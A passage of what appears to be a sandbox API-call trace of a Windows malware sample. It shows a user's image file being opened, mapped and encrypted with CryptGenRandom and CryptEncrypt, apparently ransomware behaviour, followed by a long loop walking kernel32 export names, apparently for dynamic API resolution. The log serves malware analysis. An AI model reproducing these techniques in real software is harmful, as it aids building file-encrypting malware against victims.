(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ut-sh4cqr9b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.977] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=60936) returned 1 [0086.977] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.977] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.977] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.978] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.978] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.978] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.978] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.979] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.979] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.980] CloseHandle (hObject=0x42c) returned 1 [0086.980] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.980] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.981] CloseHandle (hObject=0x0) returned 0 [0086.981] CloseHandle (hObject=0x428) returned 1 [0086.981] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.981] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.982] GetTickCount () returned 0x114e30f [0086.982] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.982] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.982] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.982] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.983] lstrlenA (lpString="kernel32.dll") returned 12 [0086.983] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.983] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.983] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.983] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.983] lstrlenA (lpString="ADDATOMA") returned 8 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.983] lstrlenA (lpString="ADDATOMW") returned 8 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.983] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.983] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.983] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.983] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.983] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.983] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.983] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.983] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.983] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.984] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.984] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.984] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.984] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.984] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.984] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.984] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.984] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.984] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.984] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.984] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.984] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.984] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.984] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.984] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.984] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.984] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.984] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.984] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.985] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.985] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.985] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.985] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.985] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.985] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.985] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.985] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.985] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.985] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.985] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.985] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.985] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.985] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.985] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.985] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.985] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.985] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.986] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.986] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.986] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.986] lstrlenA (lpString="BEEP") returned 4 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.986] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.986] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.986] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.986] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.986] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.986] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.986] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.986] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.986] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.986] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.986] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.986] lstrlenA (lpString="CANCELIO") returned 8 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.986] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.986] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.986] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.987] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.987] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.987] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.987] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.987] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.987] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.987] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.987] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.987] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.987] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.987] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.987] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.987] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.987] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.987] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.987] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.987] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.987] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.987] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.988] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.988] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.988] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.988] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.988] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.988] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.988] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.988] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.988] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.988] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.988] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.988] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.988] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.988] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.988] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.988] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.988] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" 